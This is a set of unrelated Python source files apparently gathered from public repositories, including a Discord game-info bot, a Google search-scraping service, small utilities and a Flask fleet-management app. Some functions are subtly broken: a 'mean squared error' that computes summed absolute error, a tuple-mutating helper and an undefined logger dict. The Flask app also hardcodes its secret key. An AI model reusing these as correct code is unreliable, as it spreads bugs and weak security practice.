return embed_create(ctx, title="Error!", description="Account not found!", color=0xeb4034)
name_history = Mojang.get_name_history(uuid)
except Exception:
return embed_create(ctx, title="Error!", description="Can't lookup account! (API down?)", color=0xeb4034)
past_names = [data['name'] for data in name_history if data['name'] != profile.name]
embed = embed_create(ctx, title="Minecraft account info:")
embed.set_thumbnail(url="https://cdn.discordapp.com/attachments/632730054396215299/825080584451391529/grass.png")
embed.add_field(name="Current Username:", value=discord.utils.escape_markdown(profile.name), inline=False)
embed.add_field(name="Profile UUID:", value=profile.id, inline=False)
embed.add_field(name="Past Usernames:",
value=(discord.utils.escape_markdown(", ".join(past_names)) if past_names else "No past usernames"),
inline=False)
embed.add_field(name="Skin:",
value=f"[Download Skin ({'Steve Type' if not profile.skin_model == 'slim' else 'Alex Type'})]({profile.skin_url})" if profile.skin_url else "No skin",
inline=False)
embed.add_field(name="Is legacy account?:", value="Yes" if profile.is_legacy_profile else "No", inline=False)
# Dream's UUID
if profile.id == 'ec70bcaf702f4bb8b48d276fa52a780c':
embed.set_thumbnail(
url="https://media.discordapp.net/attachments/632730054396215299/827393984875855982/ForsenCD-emote.jpg")
return embed
def mode_convert(mode):
if not mode:
return 0, ""
mode = mode.lower()
if mode in ["s", "standard", "osu", "osu!", "std", "0"]:
return 0, ""
elif mode in ["taiko", "t", "osu!taiko", "1"]:
return 1, "taiko"
elif mode in ["c", "catch", "ctb", "osu!catch", "2"]:
return 2, "catch"
elif mode in ["m", "mania", "osu!mania", "3"]:
return 3, "mania"
else:
return 0, ""
class GameCog(commands.Cog, name="Game Info"):
def __init__(self, bot):
self.osu_api = OsuApi(bot.secrets["OSU_API_KEY"])
self.bot = bot
print("GameCog init")
@commands.cooldown(1, 5, BucketType.user)
@commands.command(aliases=["mc"])
async def minecraft(self, ctx, account):
"""Gets info of minecraft accounts using current username or their UUID"""
async with ctx.channel.typing():
embed = await self.bot.loop.run_in_executor(None, sync_minecraft, ctx, account)
await ctx.send(embed=embed)
@commands.cooldown(1, 5, BucketType.user)
@commands.command(aliases=["osu!"])
async def osu(self, ctx, account, gamemode=None):
"""Gets info of osu! accounts! You can also specify"""
async with ctx.channel.typing():
mode_int, mode_name = mode_convert(gamemode)
osu_obj = await self.osu_api.get_user(user=account, mode=mode_int)
if not isinstance(osu_obj, pyosu.models.User):
embed = embed_create(ctx, title="Account not found!",
description="If you are trying to get user info, use their username or user id.",
color=0xeb4034)
elif isinstance(osu_obj, pyosu.models.User):
embed = embed_create(ctx, title=f"information for osu!{mode_name} account:")
embed.set_thumbnail(
url="https://cdn.discordapp.com/attachments/632730054396215299/825081328146841600/osu.png")
embed.add_field(name="General Info:",
value=f"Username: {osu_obj.username}\nUser ID: {osu_obj.user_id}\nLevel: {int(osu_obj.level)}\nCountry: {osu_obj.country}",
inline=False)
embed.add_field(name="Ranking Info:",
value=f"PP Score: {int(osu_obj.pp_raw)}\nRanked Score: {int(osu_obj.ranked_score)}\nTotal Score: {int(osu_obj.total_score)}\nPP Rank: {osu_obj.pp_rank}th\nCountry PP Rank: {osu_obj.pp_country_rank}th",
inline=False)
embed.add_field(name="Play Info:",
value=f"Accuracy: {int(osu_obj.accuracy)}%\n{osu_obj.playcount} (good) beatmaps played!\nAmount of SSH ranks: {osu_obj.count_rank_ssh}\nAmount of SS ranks: {osu_obj.count_rank_ss}\nAmount of SH ranks: {osu_obj.count_rank_sh}\nAmount of S ranks: {osu_obj.count_rank_s}\nAmount of A ranks: {osu_obj.count_rank_a}")
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(GameCog(bot))
| 2.359375 | 2 |
pygenome/fitness/loss.py | jorgetavares/pygenome | 1 | 12769730 | <reponame>jorgetavares/pygenome
import numpy as np
def mean_squared_error(x, y):
'''
Mean Squared Error (MSR)
Args:
x (array): array of predictions
y (array): array of labels
Returns:
the mean squared error
'''
return np.sum(np.sqrt(np.square(x - y)))
| 3.125 | 3 |
globals.py | alexandrefresnais/Cobra | 1 | 12769731 | import math
# Nb grid square
GRID_WIDTH = 10
GRID_HEIGHT = 10
# Absolute size of a grid square
GRIDSIZE = 20
# Size of window
SCREEN_WIDTH = GRID_WIDTH * GRIDSIZE
SCREEN_HEIGHT = GRID_HEIGHT * GRIDSIZE
UP = (0, -1)
DOWN = (0, 1)
LEFT = (-1, 0)
RIGHT = (1, 0)
# Returns true if a and b have same signs
def same_sign(a, b):
return (a > 0) == (b > 0)
# Important : clockwise
directions = [UP, RIGHT, DOWN, LEFT]
# Get local right direction from our current direction
def get_local_right(direction):
i = directions.index(direction) + 1
return directions[i % 4]
def get_local_down(direction):
i = directions.index(direction) + 2
return directions[i % 4]
def get_local_left(direction):
i = directions.index(direction) + 3
return directions[i % 4]
# Return a + b with a and b being tuples
def add_tuple(a, b):
res = (0, 0)
res[0] = a[0] + b[0]
res[1] = a[1] + b[1]
return res
# Pythagorian distance between two points
def distance(a, b):
return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2) | 3.546875 | 4 |
video/migrations/0003_auto_20210427_1528.py | AxelConceicao/youtube-django | 1 | 12769732 | # Generated by Django 3.1.5 on 2021-04-27 15:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('video', '0002_auto_20210427_1508'),
]
operations = [
migrations.AlterField(
model_name='video',
name='views',
field=models.IntegerField(default=0, verbose_name='Views count'),
),
]
| 1.507813 | 2 |
search_svc/search.py | mannyfin/aioget | 1 | 12769733 | import asyncio
from datetime import datetime
from itertools import combinations
import json
import glob
import os
import time
from typing import Optional, Tuple
import re
import sys
from aiohttp.client import ClientSession, TCPConnector
import redis
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/..")
from configs.base.consts import CONFIG_DIR, ASYNC_SLEEP
from core import logger
from core import async_queue, filtration, async_write
from core.async_requests import AsyncHttpRequests
from core.utils import load_config, parse_consumer, make_config, pop_arb_field_if_exists, set_arb
from parser_scripts import google, googlenews
from sys import platform
if platform != 'win32':
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
basiclogger = logger.rabbit_logger(__name__)
# todo or_combine_sites param -> lob searches -> measure perf impact
class SearchService(object):
"""
The Search Service is a generic class that is used by any process in order to accept search inputs (e.g. search
terms, keywords, sites, etc.), perform searches, and pass the results to another service. The Search Service
implements a search query generator + async http requests + webpage Data Parser (google or googlenews) + async
write to write outputs to a file.
"""
SEARCH_SERVICE_CONFIG_PATH = os.path.normpath(os.path.join(CONFIG_DIR, 'service', 'search.json')) # Proxy info, search sites, etc.
BUSINESS_CONFIGS_DIR = os.path.normpath(os.path.join(CONFIG_DIR, 'business_drivers', 'search')) # NegMedia/SJA/LOB/etc
CLIENT_CONFIGS_DIR = os.path.normpath(os.path.join(CONFIG_DIR, 'client'))
BUSINESS_CONFIGS_PATHS = glob.glob(os.path.join(BUSINESS_CONFIGS_DIR, '*.json'))
CLIENT_CONFIGS_PATHS = glob.glob(os.path.join(CLIENT_CONFIGS_DIR, '*', '*.json'))
def __init__(self, input_queue: asyncio.Queue, publish_queue: asyncio.Queue):
"""
Args:
input_queue:
publish_queue:
"""
self.service_configs = load_config(self.SEARCH_SERVICE_CONFIG_PATH)
self.business_configs = make_config(self.BUSINESS_CONFIGS_PATHS)
self.client_configs = make_config(self.CLIENT_CONFIGS_PATHS)
# todo pass in only the required params
self.async_http_requests = AsyncHttpRequests(**self.service_configs)
self.input_queue = input_queue
self.publish_queue = publish_queue
self.config_refresh = time.time()
##################3
# self.service_configs['redis_db_params']['host'] = 'localhost'
self.search_history = redis.Redis(**self.service_configs['redis_db_params'])
def start(self):
"""
Starts the Search Service by creating a worker daemons for each number of TCP connections for the desired
concurrency. After a worker completes a url request, it sends the response to a webpage parser, which extracts
the urls. Finally, the extracted urls are individually placed on messages for another service.
Issues are saved in an audit file for review
Returns:
workers, queues, session
"""
# use an intermediate queue here to limit number of messages waiting in the service.
query_queue = async_queue.get_queue(maxsize=200)
parse_queue = async_queue.get_queue()
write_queue = async_queue.get_queue()
# async with ClientSession(connector=TCPConnector(limit=self.async_http_requests.connections, ssl=False)) as \
# session:
session = ClientSession(connector=TCPConnector(limit=self.async_http_requests.connections, ssl=False))
workers = []
for _ in range(self.async_http_requests.connections):
task = asyncio.create_task(self.put_onto_query_queue(query_queue)
)
workers.append(task)
task = asyncio.create_task(async_queue.worker(query_queue, parse_queue,
self.async_http_requests.handle_requests,
session=session,
)
)
workers.append(task)
task = asyncio.create_task(parse_consumer(next_queue=parse_queue, write_queue=write_queue,
))
workers.append(task)
task = asyncio.create_task(
self.write_consumer(audit_path='audit.txt', write_queue=write_queue, publish_queue=self.publish_queue)
)
workers.append(task)
queues = [self.input_queue, self.publish_queue, query_queue, parse_queue, write_queue]
return workers, queues, session
async def put_onto_query_queue(self, query_queue: asyncio.Queue):
"""
Takes a message off of the input queue. Extracts the query and the service/business/client configuration and
places it on the query queue
Args:
query_queue:
Returns:
"""
while True:
await asyncio.sleep(ASYNC_SLEEP)
while self.input_queue.qsize():
try:
if query_queue.full():
await asyncio.sleep(ASYNC_SLEEP)
continue
# if self.input_queue.qsize():
message: dict = await self.input_queue.get()
if isinstance(message, bytes):
message = json.loads(message)
basiclogger.info(message)
entity, business_configuration, client_search_configs = self.make_configuration(message)
query_params = self._assign_query_gen_inputs(entity, business_configuration, client_search_configs)
arb_fields, message = pop_arb_field_if_exists(message)
parse = google.parse if 'google' == business_configuration['service'] else googlenews.parse
# construct query from message fields and configs
for query in self._query_gen(business_configuration, **query_params):
query['parse_func'] = parse
query['client'] = message['client']
query['business_function'] = message['business_function']
# add any arb fields.
query = set_arb(msg=query, arb=arb_fields)
if filtration.filter_entities_redis(entity, query['language'], message['business_function'],
self.business_configs['search'][message['business_function']]['refresh_period'],
self.search_history):
await query_queue.put(query)
else:
basiclogger.info(f"entity combo searched recently: {entity}|"
f"{query['language']}|{message['business_function']}")
except Exception as exc:
basiclogger.error(exc.__repr__())
self.input_queue.task_done()
await asyncio.sleep(ASYNC_SLEEP)
async def write_consumer(self, audit_path: str,
write_queue: asyncio.Queue,
publish_queue: Optional[asyncio.Queue]):
"""
used by the Search Service only right now.
.. todo:: this could be refactored by async_queue.worker
Args:
audit_path: path to audit file
publish_queue:
write_queue: asyncio.Queue where each queue item is a list of asyncio.Futures for parsing the responses
Returns:
"""
while True:
await asyncio.sleep(ASYNC_SLEEP)
futures = []
for ctr in range(write_queue.qsize()):
futures.append(write_queue.get_nowait())
write_queue.task_done()
while futures:
for _ in asyncio.as_completed(futures):
parsed_output = await _
# await async_write.write_data(output_path, f"{'|'.join(parsed_output['parsed_output'])}\n", 'a',
# encoding=None)
regexp_entity = re.sub('\W+', '', parsed_output['entity']).upper()
# popping any arb field so it doesn't get saved in the search history
arb_field, parsed_output = pop_arb_field_if_exists(parsed_output)
self.search_history.set(f"{regexp_entity}|{parsed_output['language']}|{parsed_output['business_function']}", json.dumps(parsed_output))
if publish_queue and parsed_output:
try:
# if no articles were found with the search, don't publish a message.
if 'urls' in parsed_output and 'cache_urls' in parsed_output:
for url, cache_url in zip(parsed_output['urls'], parsed_output['cache_urls']):
# check if url or cache_url is garbage
keep_url = filtration.filter_garbage_url_search_result(url,
self.business_configs['search'][
parsed_output[
'business_function']][
'url_filter_exclusion_patterns'])
keep_cache_url = True # default if no cache_url present
if cache_url:
keep_cache_url = filtration.filter_garbage_url_search_result(
cache_url, self.business_configs['search'][parsed_output['business_function']]['url_filter_exclusion_patterns']
)
if keep_url and keep_cache_url:
msg = {'url': url,
'cache_url': cache_url,
'client': parsed_output['client'],
'business_function': parsed_output['business_function'],
'date': parsed_output['date'],
'language': parsed_output['language'],
'entity': parsed_output['entity']
}
if arb_field:
msg = set_arb(msg=msg, arb=arb_field)
await publish_queue.put(msg)
else:
basiclogger.debug(f"No results found for: {parsed_output}")
except Exception as exc:
basiclogger.error(exc.__repr__())
basiclogger.info(f'error_parsed_output: {parsed_output}')
if 'error' in parsed_output and parsed_output['error']:
await async_write.write_data(audit_path, f"{parsed_output['error']}\n", 'a',
encoding=None)
if futures:
futures = [i for i in futures if not i.done()]
def _query_gen(self, business_configuration, **kwargs) -> dict:
"""
Builds a query for Google search. Wraps the entity and the keyword in double quotes. Calls other helper
functions for query creation.
- Uses the language class attribute to incorporate language specific component to url.
- The html encoded entities are created using the entities instance attribute called with
the`_encode_make_phrase` method.
- Combines all the keywords with quotes, spaces, and OR if applicable according to or_combine_kw instance
attribute and calling _encode_keyword_combos method
- Creates `site:website` if websites provided as website
instance attribute, and combines with OR if applicable and calling _encode_site_search method
- Creates date to-from string if date range provided as the date_range instance attribute and calling
` _encode_date_ranges` method
- Creates keywords_excluded string if they were provided in keywords_excluded
instance attribute and calling _encode_keywords_excluded method.
Args: entities (list): Entities list if user wanted to override self.entities
Returns:
Generator of dicts of (entity, query, cache_url, retries)
Examples:
Input:
service = ‘google’
entities = [“<NAME>”]
keywords = {'es': [“crime”,”launder”]}
or_combine_kw = True
date_range=['w']
keywords_exclusion = ['yahoo.com']
websites = ['bloomberg.com']
language = 'es'
Output:
Resulting URL:
https://www.google.com/search?safe=strict&q="<NAME>" AND ("crime" OR "launder") site:bloomberg.com
-yahoo.com&hl=es-419&gl=US&ceid=US:es-419&tbs=qdr:w
Resulting URL (encoded):
'https://www.google.com/search?safe=strict&q=%22Joe+Black%22+AND+%28%22crime%22+OR+%22launder%22%29+site
%3Abloomberg.com%20-yahoo.com&hl=es-419&gl=US&ceid=US:es-419+&tbs=qdr%3Aw'
"""
entities = kwargs['entity']
# quote = '"'
quote = '%22'
# space = '%20'
space = '+'
# self.encoded_excluded_kw = self._encode_keywords_excluded()
for language in kwargs['language']:
start_url, host_lang = self._get_start_url_host_lang(language, business_configuration)
encoded_excluded_kw = self._encode_keywords_excluded(kwargs['keywords_excluded'][language])
if not kwargs['or_combine_kw']:
for entity in entities:
for keyword in self._encode_keyword_combos(kwargs['keywords'][language]):
# todo could also replace US with MX, CL or other spanish speaking country.
# Need to assess results though
for web in self._encode_site_search(kwargs['websites'], kwargs['or_combine_websites']):
for dates in self._encode_date_ranges([kwargs['date_range']]):
space2 = '' if not web and not dates else '+'
if len(keyword[1].split(' ')) == 1:
# search for "ENTITY" keyword_one_word
yield {'entity': entity,
'url': f"{start_url}{self._encode_make_phrase(entity, space)}{quote}"
f"{keyword[1].replace(' ', '+')}{quote}{space}{web}{space}"
f"{encoded_excluded_kw}{host_lang}{space2}{dates}".strip('+'),
'cache_url': '',
'retries': 0,
'response_encoding': None,
'language': language,
'proxy_account': business_configuration['proxy_account']
}
else:
# search for "ENTITY" "keyword with multiple words"
yield {'entity': entity,
'url': f"{start_url}{self._encode_make_phrase(entity, space)}"
f"{keyword[0].replace(' ', '+')}{space}{web}{encoded_excluded_kw}"
f"{host_lang}{space2}{dates}".strip('+'),
'cache_url': '',
'retries': 0,
'response_encoding': None,
'language': language,
'proxy_account': business_configuration['proxy_account']
}
else:
# TODO refactor this
open_parens = '%28'
close_parens = '%29'
# for language in self.language:
start_url, host_lang = self._get_start_url_host_lang(language, business_configuration)
OR_keywords = '("' + '" OR "'.join(map(str, kwargs['keywords'][language])) + '")'
# apply html encodings
OR_keywords = OR_keywords.replace(' ', '+')\
.replace('(', open_parens)\
.replace(')', close_parens)\
.replace('"', quote)
# OR_keywords = OR_keywords.replace(' ', '+')
# OR_keywords = OR_keywords.replace('(', open_parens)
# OR_keywords = OR_keywords.replace(')', close_parens)
# OR_keywords = OR_keywords.replace('"', quote)
for entity in entities:
for web in self._encode_site_search(kwargs['websites'], kwargs['or_combine_websites']):
for dates in self._encode_date_ranges([kwargs['date_range']]):
space2 = '' if not web and not dates else '+'
yield {'entity': entity,
'url': f"{start_url}{self._encode_make_phrase(entity, space)}AND{space}"
f"{OR_keywords}{space}{web}{encoded_excluded_kw}{host_lang}{space2}"
f"{dates}".strip('+'),
'cache_url': '',
'retries': 0,
'response_encoding': None,
'language': language,
'proxy_account': business_configuration['proxy_account']
}
def update_configs(self):
# todo this should be outside the class or in a base class
# todo replace this with push notification
now = time.time()
# read in configs every hour
if (now - self.config_refresh) / 3600 > 1:
# Check if there are new configs
# todo potential breakage if there are same outermost keys in the config files
self.BUSINESS_CONFIGS_PATHS = glob.glob(os.path.join(self.BUSINESS_CONFIGS_DIR, '*.json'))
self.CLIENT_CONFIGS_PATHS = glob.glob(os.path.join(self.CLIENT_CONFIGS_DIR, '*', '*.json'))
self.service_configs = load_config(self.SEARCH_SERVICE_CONFIG_PATH)
self.business_configs = make_config(self.BUSINESS_CONFIGS_PATHS)
self.client_configs = make_config(self.CLIENT_CONFIGS_PATHS)
self.async_http_requests = AsyncHttpRequests(**self.service_configs)
self.config_refresh = time.time()
basiclogger.info('search service configs updated')
def check_configs(self, business_function, client):
if business_function not in self.business_configs['search'] or \
client not in self.client_configs[business_function]:
self.update_configs()
if business_function not in self.business_configs['search']:
# todo for now default to negative media
business_function = 'media'
if client not in self.client_configs[business_function]:
client = 'default'
return business_function, client
def make_configuration(self, message):
"""
Extract configuration for a specific search
Args:
message (dict): JSON response message containing instructions on how to do a search
Returns:
"""
# todo this should be outside the class?
entity = message['entity']
client = message['client'] if 'client' in message else ''
business_function = message['business_function']
# check that client/business function exist in the configs. If not update. If still not, then provide a default
business_function, client = self.check_configs(business_function, client)
business_configuration = self.business_configs['search'][business_function]
client_search_configs = self.client_configs[business_function][client]
return entity, business_configuration, client_search_configs
def _assign_query_gen_inputs(self, entity, business_configuration, client_search_configs):
# entities: list = entities if entities else [''] # _query_gen Need >=1 entity if looping over other params
keywords: dict = client_search_configs['keywords'] if 'keywords' in client_search_configs else \
business_configuration['keywords']
language: list = client_search_configs['language'] if 'language' in client_search_configs else \
list(keywords.keys())
websites: list = client_search_configs['websites'] if 'websites' in client_search_configs else \
business_configuration['websites']
or_combine_websites: bool = client_search_configs['or_combine_websites'] if 'or_combine_websites' in client_search_configs else \
business_configuration['or_combine_websites']
or_combine_kw: bool = client_search_configs['or_combine_kw'] if 'or_combine_kw' in client_search_configs else \
business_configuration['or_combine_kw']
keywords_excluded: list = client_search_configs[
'keywords_excluded'] if 'keywords_excluded' in client_search_configs else \
business_configuration['keywords_excluded']
# todo add date_range if passed as an arb message parameter
date_range: list = client_search_configs['date_range'] if 'date_range' in client_search_configs else \
business_configuration['date_range']
query_params = {'entity': [entity],
'keywords': keywords,
'language': language,
'websites': websites,
'or_combine_kw': or_combine_kw,
'or_combine_websites': or_combine_websites,
'keywords_excluded': keywords_excluded,
'date_range': date_range}
self._type_checking(**query_params)
return query_params
def _get_start_url_host_lang(self, language: str, business_configuration) -> Tuple[str, str]:
"""
Read service configs to obtain the start_url and host_lang parameters
Args:
language (str): language for the search
Returns:
start_url (str): start_url for the TLD
host_lang (str): language and geolocation-specific encoding applied to the url
"""
options = self.service_configs['service_option'][business_configuration['service']][language]
start_url = options['start_url']
host_lang = options['host_lang']
return start_url, host_lang
@staticmethod
def _encode_make_phrase(words: str, space: str):
"""
Helper function. Makes a HTML encoded string using words and spaces using html encodings to replaces spaces and
quotes with their % counterparts (ex. Space ('') = '+' and so on). Space variable can be anything to add
after the double quotes following the word.
Args:
words (str): Word to make phrase with
space (str): space
Returns:
empty string if word is None else word wrapped in quotes with space.
"""
if not words:
return ''
else:
return '%22{0}%22{1}'.format(words.replace(' ', '+').replace('&', '%26'), space)
@staticmethod
def _encode_site_search(websites: list, or_combine_websites: bool):
"""
Adds site:http://www.website.com to Google search. If website == 'None', then default case is to NOT include
site:example.com. This is useful if a search would like to search specific sites as well as not.
Ex. `site:xyz.com` for one search and not including this string in another search.
Returns:
string 'site:website.com' if websites else empty string
"""
colon = '%3A'
# default case, no websites
if websites is None or len(websites) == 0:
yield '' # '%20'
if not or_combine_websites:
for website in websites:
if website and not (website == 'None'):
yield 'site' + colon + website
else:
yield '' # '%20'
else:
if len(websites) == 1:
yield 'site' + colon + websites[0]
else:
yield 'site' + colon + '%20OR%20site%3A'.join(map(str, websites))
@staticmethod
def _encode_keywords_excluded(keywords_excluded):
"""
Generate string of filter keywords. This is to remove those keywords from search results.
This is akin to typing: -excluded_kw1 -excluded_kw2 etc. In the search bar.
Returns:
string
Examples:
Input:
keywords_excluded = ['a', 'b', 'c']
Output:
'%20-a%20-b%20-c'
"""
# default case, no filter keywords
if keywords_excluded is None or len(keywords_excluded) == 0:
return '' # '%20'
if keywords_excluded is not None:
return ''.join('%20-' + i for i in keywords_excluded)
# and for any other weird reason
# return '' # '%20'
@staticmethod
def _encode_date_ranges(date_range: list):
"""
Filter search results by date. Takes date_range list and parses the info inside and creates the string to be
added to the query.
Possible options for the element inside the date_range list are:
- "anytime" or "a"
- "hour" or "h"(past hour)
- "day" or "d" (past day)
- "week" or "w" (past week)
- "month" or "m" (past month)
- "year" or "y" (past year)
- mm/dd/yyyy,mm/dd/yyyy (between two dates with earliest first)
* The code handles the case where the two dates are out of order.
* The delimeter between the two dates can be one of ‘,- ‘ (comma, hyphen or space)
Returns:
string with the HTML encoded date
Examples:
Input:
date1, date2 are format mm/dd/yyyy,mm/dd/yyyy
Output:
'&tbs=cdr%3A1%2Ccd_min%3A' + date1 + '%2Ccd_max%3A' + date2
"""
# if (date_range is None) or (len(date_range) == 0):
# yield '' # '%20'
# %3A is a colon :
pre_string = '&tbs=qdr%3A'
for date_entry in date_range:
if (date_entry is None) or (not date_entry) or (isinstance(date_entry, list) and len(date_entry) == 0):
yield ''
elif date_entry == 'anytime' or date_entry == 'a':
yield '&tbas=0'
elif date_entry == 'hour' or date_entry == 'h':
yield pre_string + 'h'
elif date_entry == 'day' or date_entry == 'd':
yield pre_string + 'd'
elif date_entry == 'week' or date_entry == 'w':
yield pre_string + 'w'
elif date_entry == 'month' or date_entry == 'm':
yield pre_string + 'm'
elif date_entry == 'year' or date_entry == 'y':
yield pre_string + 'y'
else:
try:
# if any, and find separator
if ',' in date_entry:
date1, date2 = date_entry.split(',')
elif ' ' in date_entry:
date1, date2 = date_entry.split(' ')
else:
date1, date2 = date_entry.split('-')
date1_check = datetime.strptime(date1, '%m/%d/%Y')
date2_check = datetime.strptime(date2, '%m/%d/%Y')
# check that dates are in order of min date , max date
if date2_check < date1_check:
date1, date2 = date2, date1
date1.replace('/', '%2F')
date2.replace('/', '%2F')
yield '&tbs=cdr%3A1%2Ccd_min%3A' + date1 + '%2Ccd_max%3A' + date2
except Exception as exc:
basiclogger.info(exc)
# if all else fails, yield ''
yield '' # '%20'
@staticmethod
def _encode_keyword_combos(keywords: list, degree: int = 1):
"""
Generates tuples for combinations of keywords. See here for more information on how the degree works:
https://en.wikipedia.org/wiki/Binomial_coefficient Most times we want to use degree=1. However, for research
purposes we may want to test out different keyword combinations.
Args:
keywords (list): list of keywords. If provided from config file, provide self.keywords[language] to get
the list
degree (int): Degree of combinations (the k in n_choose_k from Probability & Statistics
Returns:
Generator tuples of form (comb(keywords,1), keyword)
Examples:
k = ['a', 'b', 'c', 'd']
Input:
combos(k,2)
Output:
("a"%20"b", 'a b')
("a"%20"c", 'a c')
("a"%20"d", 'a d')
("b"%20"c", 'b c')
("b"%20"d", 'b d')
("c"%20"d", 'c d')
"""
quote = '%22'
if len(keywords) == 0:
yield '%20', '%20'
for x in list(combinations(keywords, degree)):
if not x:
# for empty string
yield '%20', '%20'
# yield ('"' + '"%20"'.join(x) + '"', ' '.join(x))
yield quote + '%22%20%22'.join(x) + quote, ' '.join(x)
@staticmethod
def _type_checking(**kwargs):
"""
Rudimentary type checking of input variables. This is run at the end of the __init__ instance of a class.
Returns:
None, if checked inputs pass given criteria
"""
if (not isinstance(kwargs['entity'], list) or len(kwargs['entity']) == 0) and (
not isinstance(kwargs['keywords'], dict)):
raise ValueError('entities and keywords must both be lists with len >0')
if not (isinstance(kwargs['keywords_excluded'], dict) or kwargs['keywords_excluded'] is None):
raise TypeError('filter keywords must be of type == dict with the key a supported language string')
if len(set(kwargs['keywords'])) < len(kwargs['keywords']):
raise ValueError('Don\'t use duplicate keywords.')
if kwargs['keywords_excluded'] is not None:
for filtered in kwargs['keywords_excluded']:
if len(filtered.replace(' ', '')) == 0:
raise ValueError('Don\'t use empty quotes or space in filter. '
'Make sure there is no end line of file.')
| 2.265625 | 2 |
code/metrics/logger.py | HS-YN/PanoAVQA | 3 | 12769734 | # Simple tb logger
import torch
from exp import ex
'''
geometry_normalizer = {
'cartesian': 4, # [0,1]x[0,1]x[0,1]x[0,1]
'angular': 98.696, # [-pi,pi]x[-.5pi,.5pi]x[0,2pi]x[0,pi]
'spherical': 61.348, # [-1,1]x[-1,1]x[-1,1]x[0,2pi]x[0,pi]
'quaternion': 17 # [0,1]x[-1,1]x[-1,1]x[0,2]x[0,2]
}
'''
def write_logs(logger, timestamp, lr, stat, meta, mode="train"):
if mode == "train":
logger.add_scalar('Train/lr', lr, timestamp)
for k, v in stat.items():
if type(v) == torch.Tensor and v.dim() == 0:
logger.add_scalar(f'Train/{k}', v.item(), timestamp)
elif type(v) == str:
logger.add_text(f'Train/{k}', v, timestamp)
else:
for k, v in stat.items():
if type(v) in [int, float]:
logger.add_scalar(f'{mode.capitalize()}/{k}', v, timestamp)
elif type(v) == torch.Tensor and v.dim() == 0:
logger.add_scalar(f'{mode.capitalize()}/{k}', v.item(), timestamp)
elif type(v) == str:
logger.add_text(f'{mode.capitalize()}/{k}', v, timestamp)
#logger.add_image('Eval/image', img, timestamp)
@ex.capture()
def adjust_grounding_error(error, geometry):
return error * geometry_normalizer[geometry] | 2.25 | 2 |
complete/31 - 40/Problem31/main2.py | this-jacob/project-euler | 0 | 12769735 | from time import time
def main():
start = time()
target = 200
ways = 0
for a in range(target, -1, -200):
for b in range(a, -1, -100):
for c in range(b, -1, -50):
for d in range(c, -1, -20):
for e in range(d, -1, -10):
for f in range(e, -1, -5):
for g in range(f, -1, -2):
ways += 1
print(ways)
print(time() - start)
if __name__ == '__main__':
main()
| 3 | 3 |
app.py | Siddhesh268/Fleet-Management-system | 0 | 12769736 | <reponame>Siddhesh268/Fleet-Management-system
import sys,pickle
from flask import Flask,flash, redirect, url_for, request, render_template, abort, jsonify,g
from socket import socket, AF_INET, SOCK_STREAM
from connection import setConnection
from Analysis import *
app = Flask(__name__)
app.secret_key = 'my unobvious secret key'
@app.route('/logout/')
def logout():
flash(setConnection(["stop"]))
return render_template('bye.html')
@app.route('/invoice/<trip_id>')
def invoice(trip_id):
trip=setConnection(["read_tripByID",trip_id])
return render_template('invoice.html',trip=trip)
@app.route('/expenseReport/')
def expenseReport():
Expenditure()
return redirect(url_for('index'))
@app.route('/ProfitLossReport/')
def ProfitLossReport():
liabilityasset()
return redirect(url_for('index'))
@app.route('/MaintenanceReport/')
def MaintenanceReport():
Maintenance()
return redirect(url_for('index'))
@app.route('/driver_on_vehicle/', methods=['POST'])
def driver_on_vehicle():
if request.method == 'POST':
lis = ["write_driverOnVehicle",request.form["veh_no"],request.form["driver_name"]]
flash(setConnection(lis))
return redirect(url_for('index'))
@app.route('/start_trip/<veh_no>', methods=['POST'])
def start_trip(veh_no):
if request.method == 'POST':
lis = ["write_trips",veh_no,request.form["customer_name"],request.form["source"],request.form["destination"],request.form["cost"],request.form["freight"]]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/stop_trip/<veh_no>/<trip_id>', methods=['POST'])
def stop_trip(veh_no,trip_id):
if request.method == 'POST':
lis = ["update_trip",trip_id]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/add_trip_details/<veh_no>/<trip_id>', methods=['POST'])
def add_trip_details(veh_no,trip_id):
if request.method == 'POST':
lis = ["write_trip_details",trip_id,request.form["amt"],request.form["date_of_tran"],request.form["place"],request.form["reason"]]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/deleteVehicle/<veh_no>', methods=['POST'])
def deleteVehicle(veh_no):
if request.method == 'POST':
flash(setConnection(["delete_vehicles",veh_no]))
return redirect(url_for('index'))
@app.route('/deleteDriver/<driver_id>', methods=['POST'])
def deleteDriver(driver_id):
if request.method == 'POST':
flash(setConnection(["delete_drivers",driver_id]))
return redirect(url_for('index'))
@app.route('/insurance/<veh_no>', methods=['POST'])
def insurance(veh_no):
if request.method == 'POST':
lis = ["write_insurances",veh_no,request.form["ins_no"],request.form["validf"],request.form["validu"],request.form["cost"],request.form["icomp"]]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/permit/<veh_no>', methods=['POST'])
def permit(veh_no):
if request.method == 'POST':
lis = ["write_permits",veh_no,request.form["pno"],request.form["validf"],request.form["validu"],request.form["cost"]]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/loan/<veh_no>', methods=['POST'])
def loan(veh_no):
if request.method == 'POST':
lis = ["write_loans",veh_no,request.form["lno"],request.form["costt"],request.form["lcomp"],request.form["dur"],request.form["intr"]]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/maintenance/<veh_no>', methods=['POST'])
def maintenance(veh_no):
if request.method == 'POST':
lis = ["write_maintenance",veh_no,request.form["rmk"],request.form["plc"],request.form["cost"],request.form["vend"],request.form["dom"]]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/tax/<veh_no>', methods=['POST'])
def tax(veh_no):
if request.method == 'POST':
lis = ["write_taxes",veh_no,request.form["tno"],request.form["validf"],request.form["validu"],request.form["cost"]]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/add_customer/', methods=['POST'])
def add_customer():
if request.method == 'POST':
lis = ["write_customers",request.form["Cus_name"],request.form["Comp_name"],request.form["Cus_contact"],request.form["Cus_address"]]
flash(setConnection(lis))
